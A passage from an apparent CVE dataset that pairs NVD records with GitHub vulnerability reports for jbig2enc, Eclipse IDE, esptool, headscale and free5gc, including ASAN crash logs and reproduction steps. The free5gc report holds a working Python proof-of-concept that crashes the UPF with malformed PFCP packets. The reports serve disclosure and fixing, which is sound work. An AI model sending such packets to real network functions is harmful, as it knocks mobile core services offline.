>::deallocate(std::allocator<std::_List_node<int> >&, std::_List_node<int>*, unsigned long) (/test2/jbig2enc/src/jbig2+0x238f3) #3 0x555555571fc7 in std::__cxx11::_List_base<int, std::allocator<int> >::_M_put_node(std::_List_node<int>*) (/test2/jbig2enc/src/jbig2+0x1dfc7) #4 0x55555556e28e in std::__cxx11::list<int, std::allocator<int> >::_M_erase(std::_List_iterator<int>) (/test2/jbig2enc/src/jbig2+0x1a28e) #5 0x55555556c1f4 in std::__cxx11::list<int, std::allocator<int> >::pop_back() (/test2/jbig2enc/src/jbig2+0x181f4) #6 0x555555560ba2 in remove_templates /test2/jbig2enc/src/jbig2enc.cc:251 #7 0x555555562efd in jbig2enc_auto_threshold_using_hash(jbig2ctx*) /test2/jbig2enc/src/jbig2enc.cc:484 #8 0x55555555f4f1 in main /test2/jbig2enc/src/jbig2.cc:492 #9 0x7ffff6c1f082 in __libc_start_main ../csu/libc-start.c:308 previously allocated by thread T0 here: #0 0x7ffff7691587 in operator new(unsigned long) ../../../../src/libsanitizer/asan/asan_new_delete.cc:104 #1 0x55555557b669 in __gnu_cxx::new_allocator<std::_List_node<int> >::allocate(unsigned long, void const*) (/test2/jbig2enc/src/jbig2+0x27669) #2 0x55555557a524 in std::allocator_traits<std::allocator<std::_List_node<int> > >::allocate(std::allocator<std::_List_node<int> >&, unsigned long) (/test2/jbig2enc/src/jbig2+0x26524) #3 0x555555577918 in std::__cxx11::_List_base<int, std::allocator<int> >::_M_get_node() (/test2/jbig2enc/src/jbig2+0x23918) #4 0x55555557236d in std::_List_node<int>* std::__cxx11::list<int, std::allocator<int> >::_M_create_node<int const&>(int const&) (/test2/jbig2enc/src/jbig2+0x1e36d) #5 0x55555556e99f in void std::__cxx11::list<int, std::allocator<int> >::_M_insert<int const&>(std::_List_iterator<int>, int const&) (/test2/jbig2enc/src/jbig2+0x1a99f) #6 0x555555577cf2 in void std::__cxx11::list<int, std::allocator<int> >::emplace_back<int const&>(int const&) (/test2/jbig2enc/src/jbig2+0x23cf2) #7 0x5555555728f2 in void std::__cxx11::list<int, std::allocator<int> >::_M_initialize_dispatch<std::_List_const_iterator<int> >(std::_List_const_iterator<int>, std::_List_const_iterator<int>, std::__false_type) (/test2/jbig2enc/src/jbig2+0x1e8f2) #8 0x55555556ebe7 in std::__cxx11::list<int, std::allocator<int> >::list(std::__cxx11::list<int, std::allocator<int> > const&) (/test2/jbig2enc/src/jbig2+0x1abe7) #9 0x55555556cbb6 in std::pair<unsigned int, std::__cxx11::list<int, std::allocator<int> > >::pair<int&, std::__cxx11::list<int, std::allocator<int> >&, true>(int&, std::__cxx11::list<int, std::allocator<int> >&) (/test2/jbig2enc/src/jbig2+0x18bb6) #10 0x555555562cba in jbig2enc_auto_threshold_using_hash(jbig2ctx*) /test2/jbig2enc/src/jbig2enc.cc:471 #11 0x55555555f4f1 in main /test2/jbig2enc/src/jbig2.cc:492 #12 0x7ffff6c1f082 in __libc_start_main ../csu/libc-start.c:308 SUMMARY: AddressSanitizer: heap-use-after-free /test2/jbig2enc/src/jbig2enc.cc:248 in remove_templates Shadow bytes around the buggy address: 0x0c067fffaa30: fa fa fd fd fd fa fa fa fd fd fd fa fa fa 00 00 0x0c067fffaa40: 00 fa fa fa fd fd fd fa fa fa fd fd fd fa fa fa 0x0c067fffaa50: fd fd fd fa fa fa 00 00 00 fa fa fa fd fd fd fa 0x0c067fffaa60: fa fa fd fd fd fa fa fa fd fd fd fa fa fa 00 00 0x0c067fffaa70: 00 fa fa fa fd fd fd fa fa fa fd fd fd fa fa fa =>0x0c067fffaa80: fd fd fd fa fa fa fd fd fd fa fa fa fd fd[fd]fa 0x0c067fffaa90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fffaaa0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fffaab0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fffaac0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fffaad0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==1464517==ABORTING ``` ### Reproduction ```shell git clone https://github.com/agl/jbig2enc.git cd jbig2enc apt install libleptonica-dev ./autogen.sh CFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" CXXFLAGS=" -fsanitize=address -fno-omit-frame-pointer -g" ./configure --disable-shared make -j24 ./src/jbig2 -s -a -p Poc1jbig2enc ``` ### PoC Poc1jbig2enc: https://github.com/Frank-Z7/z-vulnerabilitys/blob/main/Poc1jbig2enc ### Version ```shell root@38ad1e4b9d16:/test2/jbig2enc# ./src/jbig2 --version jbig2enc 0.28 ``` ### Reference https://github.com/agl/jbig2enc ### Environment ``` ubuntu:20.04 gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.2) clang version 10.0.0-4ubuntu1 afl-cc++4.09 ``` ### Credit Zeng Yunxiang
heap-use-after-free in jbig2enc via jbig2enc_auto_threshold_using_hash in src/jbig2enc.cc.
https://api.github.com/repos/agl/jbig2enc/issues/84/comments
2
2023-10-16T17:25:59Z
2024-12-19T17:54:29Z
https://github.com/agl/jbig2enc/issues/84
1,945,735,940
84
5,736
CVE-2023-46363
2023-11-08T21:15:08.673
jbig2enc v0.28 was discovered to contain a SEGV via jbig2_add_page in src/jbig2enc.cc:512.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://github.com/agl/jbig2enc" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/agl/jbig2enc/issues/85" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "https://github.com/agl/jbig2enc" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/agl/jbig2enc/issues/85" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jbig2enc_project:jbig2enc:0.28:*:*:*:*:*:*:*", "matchCriteriaId": "5BB6C453-2F4A-4ED7-B529-879B4527FBE3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/agl/jbig2enc/issues/85
[ "Exploit", "Issue Tracking", "Vendor Advisory" ]
github.com
[ "agl", "jbig2enc" ]
# SEGV in jbig2enc ### Description jbig2enc v0.28 was discovered to contain a SEGV via jbig2_add_page in src/jbig2enc.cc:512. This vulnerability can lead to a Denial of Service (DoS). ### ASAN Log ./src/jbig2 -s -S -p -v -d -2 -O out.png Poc2jbig2enc ```shell AddressSanitizer:DEADLYSIGNAL ================================================================= ==2937923==ERROR: AddressSanitizer: SEGV on unknown address 0x62f00df00400 (pc 0x7ffff7267108 bp 0x6060000000e0 sp 0x7fffffffe0e0 T0) ==2937923==The signal is caused by a READ memory access. #0 0x7ffff7267107 in pixSetPadBits (/lib/x86_64-linux-gnu/liblept.so.5+0x12e107) #1 0x7ffff71c93f4 in pixConnCompPixa (/lib/x86_64-linux-gnu/liblept.so.5+0x903f4) #2 0x7ffff72262d8 in jbGetComponents (/lib/x86_64-linux-gnu/liblept.so.5+0xed2d8) #3 0x7ffff72289eb in jbAddPage (/lib/x86_64-linux-gnu/liblept.so.5+0xef9eb) #4 0x5555555633ad in jbig2_add_page(jbig2ctx*, Pix*) /test2/jbig2enc/src/jbig2enc.cc:512 #5 0x55555555f408 in main /test2/jbig2enc/src/jbig2.cc:482 #6 0x7ffff6c1f082 in __libc_start_main ../csu/libc-start.c:308 #7 0x55555555bf4d in _start (/test2/jbig2enc/src/jbig2+0x7f4d) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/lib/x86_64-linux-gnu/liblept.so.5+0x12e107) in pixSetPadBits ==2937923==ABORTING ``` ### Reproduction ```shell git clone https://github.com/agl/jbig2enc.git cd jbig2enc apt install libleptonica-dev ./autogen.sh CFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" CXXFLAGS=" -fsanitize=address -fno-omit-frame-pointer -g" ./configure --disable-shared make -j24 ./src/jbig2 -s -S -p -v -d -2 -O out.png Poc2jbig2enc ``` ### PoC Poc2jbig2enc: https://github.com/Frank-Z7/z-vulnerabilitys/blob/main/Poc2jbig2enc ### Version ```shell root@38ad1e4b9d16:/test2/jbig2enc# ./src/jbig2 --version jbig2enc 0.28 ``` ### Reference https://github.com/agl/jbig2enc ### Environment ``` ubuntu:20.04 gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.2) clang version 10.0.0-4ubuntu1 afl-cc++4.09 ``` ### Credit Zeng Yunxiang
SEGV in jbig2enc
https://api.github.com/repos/agl/jbig2enc/issues/85/comments
2
2023-10-16T17:34:18Z
2024-12-19T18:03:12Z
https://github.com/agl/jbig2enc/issues/85
1,945,750,410
85
5,737
CVE-2023-4218
2023-11-09T09:15:08.320
In Eclipse IDE versions < 2023-09 (4.29) some files with xml content are parsed vulnerable against all sorts of XXE attacks. The user just needs to open any evil project or update an open project with a vulnerable file (for example for review a foreign repository or patch).
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 1.3, "impactScore": 3.6, "source": "emo@eclipse.org", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 1.3, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "emo@eclipse.org", "tags": [ "Patch" ], "url": "https://github.com/eclipse-cdt/cdt/commit/c7169b3186d2fef20f97467c3e2ad78e2943ed1b" }, { "source": "emo@eclipse.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/eclipse-emf/org.eclipse.emf/issues/10" }, { "source": "emo@eclipse.org", "tags": [ "Patch" ], "url": "https://github.com/eclipse-jdt/eclipse.jdt.core/commit/38dd2a878f45cdb3d8d52090f1d6d1b532fd4c4d" }, { "source": "emo@eclipse.org", "tags": [ "Patch" ], "url": "https://github.com/eclipse-jdt/eclipse.jdt.ui/commit/13675b1f8a74f47de4da89ed0ded6af7c21dfbec" }, { "source": "emo@eclipse.org", "tags": [ "Patch" ], "url": "https://github.com/eclipse-pde/eclipse.pde/pull/632/" }, { "source": "emo@eclipse.org", "tags": [ "Patch" ], "url": "https://github.com/eclipse-pde/eclipse.pde/pull/667/" }, { "source": "emo@eclipse.org", "tags": [ "Patch" ], "url": "https://github.com/eclipse-platform/eclipse.platform.releng.buildtools/pull/45" }, { "source": "emo@eclipse.org", "tags": [ "Patch" ], "url": "https://github.com/eclipse-platform/eclipse.platform.swt/commit/bf71db5ddcb967c0863dad4745367b54f49e06ba" }, { "source": "emo@eclipse.org", "tags": [ "Patch" ], "url": "https://github.com/eclipse-platform/eclipse.platform.ui/commit/f243cf0a28785b89b7c50bf4e1cce48a917d89bd" }, { "source": "emo@eclipse.org", "tags": [ "Patch" ], "url": "https://github.com/eclipse-platform/eclipse.platform/pull/761" }, { "source": "emo@eclipse.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://gitlab.eclipse.org/security/vulnerability-reports/-/issues/8" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/eclipse-cdt/cdt/commit/c7169b3186d2fef20f97467c3e2ad78e2943ed1b" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/eclipse-emf/org.eclipse.emf/issues/10" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/eclipse-jdt/eclipse.jdt.core/commit/38dd2a878f45cdb3d8d52090f1d6d1b532fd4c4d" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/eclipse-jdt/eclipse.jdt.ui/commit/13675b1f8a74f47de4da89ed0ded6af7c21dfbec" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/eclipse-pde/eclipse.pde/pull/632/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/eclipse-pde/eclipse.pde/pull/667/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/eclipse-platform/eclipse.platform.releng.buildtools/pull/45" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/eclipse-platform/eclipse.platform.swt/commit/bf71db5ddcb967c0863dad4745367b54f49e06ba" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/eclipse-platform/eclipse.platform.ui/commit/f243cf0a28785b89b7c50bf4e1cce48a917d89bd" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/eclipse-platform/eclipse.platform/pull/761" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://gitlab.eclipse.org/security/vulnerability-reports/-/issues/8" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:eclipse:eclipse_ide:*:*:*:*:*:*:*:*", "matchCriteriaId": "9B8336F1-FA6C-46B0-B4D2-F5B01D3F64DD", "versionEndExcluding": "4.29", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:eclipse:org.eclipse.core.runtime:*:*:*:*:*:*:*:*", "matchCriteriaId": "25A5577C-DC07-414F-AF2E-E45B65408680", "versionEndExcluding": "3.29.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:eclipse:pde:*:*:*:*:*:*:*:*", "matchCriteriaId": "81620F59-7825-4EAC-AF33-103FD0F203F9", "versionEndExcluding": "3.13.2400", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "611" ]
611
https://github.com/eclipse-emf/org.eclipse.emf/issues/10
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "eclipse-emf", "org.eclipse.emf" ]
Please provide an XML load option for whether or not to resolve external entities. And please disable external loading by default. It would be ok, to have a fixed set of external files precached locally like in org.eclipse.help.internal.entityresolver.LocalEntityResolver / /org.eclipse.help/dtds/internal
do not to resolve external entities
https://api.github.com/repos/eclipse-emf/org.eclipse.emf/issues/10/comments
0
2023-07-31T16:07:39Z
2023-08-01T12:52:20Z
https://github.com/eclipse-emf/org.eclipse.emf/issues/10
1,829,582,952
10
5,738
CVE-2023-46894
2023-11-09T16:15:34.887
An issue discovered in esptool 4.6.2 allows attackers to view sensitive information via weak cryptographic algorithm.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit" ], "url": "https://github.com/espressif/esptool/issues/926" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit" ], "url": "https://github.com/espressif/esptool/issues/926" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:espressif:esptool:4.6.2:*:*:*:*:*:*:*", "matchCriteriaId": "54405C4F-579C-43E5-B50E-AE8F473C7D49", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "326" ]
326
https://github.com/espressif/esptool/issues/926
[ "Exploit" ]
github.com
[ "espressif", "esptool" ]
### Operating System ALL ### Esptool Version 4.6.2 ### Python Version python3.x ### Full Esptool Command Line that Was Run None ### Esptool Output ```shell Description: I have identified a security vulnerability in the esptool project's use of AES ECB (Electronic Codebook) mode for initialization. This vulnerability can potentially expose sensitive information and compromise the security of the application. Locations: https://github.com/espressif/esptool/blob/master/espsecure/__init__.py#L128 https://github.com/espressif/esptool/blob/master/espsecure/__init__.py#L1195 Version: esptool <= 4.6.2 ``` ### What is the Expected Behaviour? Expected Behavior: Instead of using AES ECB, it is recommended to use more secure encryption modes, such as AES CBC (Cipher Block Chaining) or AES GCM (Galois/Counter Mode), for configuration in order to enhance the security of esptool. Recommendations: It is strongly recommended to update the project's code at line 128 and line 1195 in the __init__.py file to use more secure encryption modes, such as AES CBC or AES GCM, for configuration. This will help mitigate the potential security risks associated with using AES ECB.Otherwise,the cryprography.io(https://cryptography.io/) crypto library is a good programming practices. ### More Information _No response_ ### Other Steps to Reproduce _No response_
Cryptographic API Misuse Vulnerability: AES ECB used for initialization (ESPTOOL-756)
https://api.github.com/repos/espressif/esptool/issues/926/comments
1
2023-10-23T14:32:24Z
2023-10-27T02:27:48Z
https://github.com/espressif/esptool/issues/926
1,957,318,275
926
5,739
CVE-2023-47390
2023-11-11T18:15:14.683
Headscale through 0.22.3 writes bearer tokens to info-level logs.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/juanfont/headscale/issues/1259" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/juanfont/headscale/issues/1259" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:juanfont:headscale:*:*:*:*:*:*:*:*", "matchCriteriaId": "42E94F72-9B5D-4380-A9C4-940FF6726DC5", "versionEndExcluding": null, "versionEndIncluding": "0.22.3", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "532" ]
532
https://github.com/juanfont/headscale/issues/1259
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "juanfont", "headscale" ]
<!-- Headscale is a multinational community across the globe. Our common language is English. Please consider raising the bug report in this language. --> **Bug description** Looking at the headscale logs, it logs this at info level when accessing the HTTP api: ``` 2023-03-11T21:13:56Z INF unary dur=0.815623 md={":authority":"/var/run/headscale.sock","authorization":"Bearer XXX.XXX","content-type":"application/grpc","grpcgateway-accept":"*/*","grpcgateway-authorization":"Bearer XXX.XXX","grpcgateway-user-agent":"python-httpx/0.23.3","user-agent":"grpc-go/1.51.0","x-forwarded-for":"xxxxx","x-forwarded-host":"xxxxxx"} method=ListApiKeys req={} service=headscale.v1.HeadscaleService ``` This includes the whole bearer token. It would be great if the credentials wouldn't get logged :)
Headscale logs bearer tokens
https://api.github.com/repos/juanfont/headscale/issues/1259/comments
13
2023-03-11T21:18:28Z
2024-02-29T15:52:31Z
https://github.com/juanfont/headscale/issues/1259
1,620,148,580
1,259
5,740
CVE-2023-47346
2023-11-13T22:15:07.740
Buffer Overflow vulnerability in free5gc 3.3.0, UPF 1.2.0, and SMF 1.2.0 allows attackers to cause a denial of service via crafted PFCP messages.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/free5gc/free5gc/issues/482" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/free5gc/free5gc/issues/482" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:free5gc:free5gc:3.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "89BA8BA8-E366-48F9-930A-91ED1442AAFE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:free5gc:smf:1.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "59FD3FA5-3F55-4616-93A9-B0A985F750C3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:free5gc:upf:1.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "25D11118-18E2-4891-B3BE-57D1AF6A01D5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/free5gc/free5gc/issues/482
[ "Exploit", "Issue Tracking" ]
github.com
[ "free5gc", "free5gc" ]
## Describe the bug While testing the free5gc UPF for some PFCP basic and security features, I could trigger several crashes when it receives special kind of PFCP messages (the secondary IE type is larger than 0x7fff). This could cause DOS of any UPF instance, all memory issues due to this kind of PFCP messages are caught by the GO memory runtime, which would casue a panic and crash. ## To Reproduce Steps to reproduce the behavior: 1. Build the UPF with source code 2. Run the bin/upf with default config/upfcfg.yaml 3. Run the following POC python script ```python #!/usr/bin/env python3 import socket udp_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) udp_socket.settimeout(1.0) pfcp_association_setup_request = b'\x20\x05\x00\x1f\x00\x00\x01\x00\x00\x3c\x00\x05\x00\x0a\x64\xc8\x64\x00\x60\x00\x04\xe8\x1f\xdc\x30\x00\x2b\x00\x06\x21\x00\x00\x00\x00\x00' """ PFCP Heartbeat Request with a second IE whose type is 0xffff (larger than 0x7fff) """ pfcp_heartbeat_request = b'\x20\x01\x00\x0f\x00\x00\x00\xff\xff\xff\x00\x00\x60\x00\x04\xe8\x1f\xdc\x30' udp_socket.sendto(pfcp_association_setup_request, ('127.0.0.8', 8805)) try: udp_socket.recv(65535) except Exception as exception: print(f"Receive failed: {exception}") udp_socket.sendto(pfcp_heartbeat_request, ('127.0.0.8', 8805)) try: udp_socket.recv(65535) except Exception as exception: print(f"Receive failed: {exception}") udp_socket.close() ``` ## Expected behavior Any people could leverage this to cause DOS and resource consumption against a pool of UPF. As much as possible, check this kind of PFCP messages whose second IE type is larger than 0x7ffff, update handling logic or just drop them to avoid frequent crashes. This will greatly improve the availability, stability, and security of free5gc UPF. ## Screenshots No special screenshot is provided. ## Environment (please complete the following information): - free5GC Version: v3.3.0 - OS: Ubuntu 20.04 - Kernel version: 5.4.5-050405-generic - go version: go1.21.1 linux/amd64 ## Trace File ### Configuration File No specific configuration is required. ### PCAP File No specific pcap file is provided. ### Log File ```bash time="2023-09-22T03:25:30.099608396+08:00" level="info" msg="UPF version: \n\tNot specify ldflags (which link version) during go build\n\tgo version: go1.21.1 linux/amd64" CAT="Main" NF="UPF" time="2023-09-22T03:25:30.099702825+08:00" level="info" msg="Read config from [upfcfg.yaml]" CAT="CFG" NF="UPF" time="2023-09-22T03:25:30.102422644+08:00" level="info" msg="==================================================" CAT="CFG" NF="UPF" time="2023-09-22T03:25:30.102461710+08:00" level="info" msg="(*factory.Config)(0xc0004bb0e0)({\n\tVersion: (string) (len=5) \"1.0.3\",\n\tDescription: (string) (len=31) \"UPF initial local configuration\",\n\tPfcp: (*factory.Pfcp)(0xc00042d470)({\n\t\tAddr: (string) (len=9) \"127.0.0.8\",\n\t\tNodeID: (string) (len=9) \"127.0.0.8\",\n\t\tRetransTimeout: (time.Duration) 1s,\n\t\tMaxRetrans: (uint8) 3\n\t}),\n\tGtpu: (*factory.Gtpu)(0xc00042d980)({\n\t\tForwarder: (string) (len=5) \"gtp5g\",\n\t\tIfList: ([]factory.IfInfo) (len=1 cap=1) {\n\t\t\t(factory.IfInfo) {\n\t\t\t\tAddr: (string) (len=9) \"127.0.0.8\",\n\t\t\t\tType: (string) (len=2) \"N3\",\n\t\t\t\tName: (string) \"\",\n\t\t\t\tIfName: (string) \"\",\n\t\t\t\tMTU: (uint32) 0\n\t\t\t}\n\t\t}\n\t}),\n\tDnnList: ([]factory.DnnList) (len=1 cap=1) {\n\t\t(factory.DnnList) {\n\t\t\tDnn: (string) (len=8) \"internet\",\n\t\t\tCidr: (string) (len=12) \"10.60.0.0/24\",\n\t\t\tNatIfName: (string) \"\"\n\t\t}\n\t},\n\tLogger: (*factory.Logger)(0xc000023c40)({\n\t\tEnable: (bool) true,\n\t\tLevel: (string) (len=4) \"info\",\n\t\tReportCaller: (bool) false\n\t})\n})\n" CAT="CFG" NF="UPF" time="2023-09-22T03:25:30.102518017+08:00" level="info" msg="==================================================" CAT="CFG" NF="UPF" time="2023-09-22T03:25:30.102550910+08:00" level="info" msg="Log level is set to [info]" CAT="Main" NF="UPF" time="2023-09-22T03:25:30.102559413+08:00" level="info" msg="Report Caller is set to [false]" CAT="Main" NF="UPF" time="2023-09-22T03:25:30.114437499+08:00" level="info" msg="starting Gtpu Forwarder [gtp5g]" CAT="Main" NF="UPF" time="2023-09-22T03:25:30.114705992+08:00" level="info" msg="GTP Address: \"127.0.0.8:2152\"" CAT="Main" NF="UPF" time="2023-09-22T03:25:30.133751688+08:00" level="info" msg="buff netlink server started" CAT="BUFF" NF="UPF" time="2023-09-22T03:25:30.133860807+08:00" level="info" msg="perio server started" CAT="Perio" NF="UPF" time="2023-09-22T03:25:30.133875168+08:00" level="info" msg="Forwarder started" CAT="Gtp5g" NF="UPF" time="2023-09-22T03:25:30.135060078+08:00" level="info" msg="starting pfcp server" CAT="PFCP" LAddr="127.0.0.8:8805" NF="UPF" time="2023-09-22T03:25:30.135468767+08:00" level="info" msg="pfcp server started" CAT="PFCP" LAddr="127.0.0.8:8805" NF="UPF" time="2023-09-22T03:25:30.135481293+08:00" level="info" msg="UPF started" CAT="Main" NF="UPF" time="2023-09-22T03:25:44.317661998+08:00" level="info" msg="handleAssociationSetupRequest" CAT="PFCP" LAddr="127.0.0.8:8805" NF="UPF" time="2023-09-22T03:25:44.317826268+08:00" level="info" msg="New node" CAT="PFCP" CPNodeID="10.100.200.100" LAddr="127.0.0.8:8805" NF="UPF" time="2023-09-22T03:25:44.318770003+08:00" level="fatal" msg="panic: runtime error: slice bounds out of range [7:5]\ngoroutine 17 [running]:\nruntime/debug.Stack()\n\t/snap/go/10339/src/runtime/debug/stack.go:24 +0x5e\ngithub.com/free5gc/go-upf/internal/pfcp.(*PfcpServer).main.func1()\n\t/home/lee/Desktop/free5gc/NFs/upf/internal/pfcp/pfcp.go:86 +0x4a\npanic({0x84f480?, 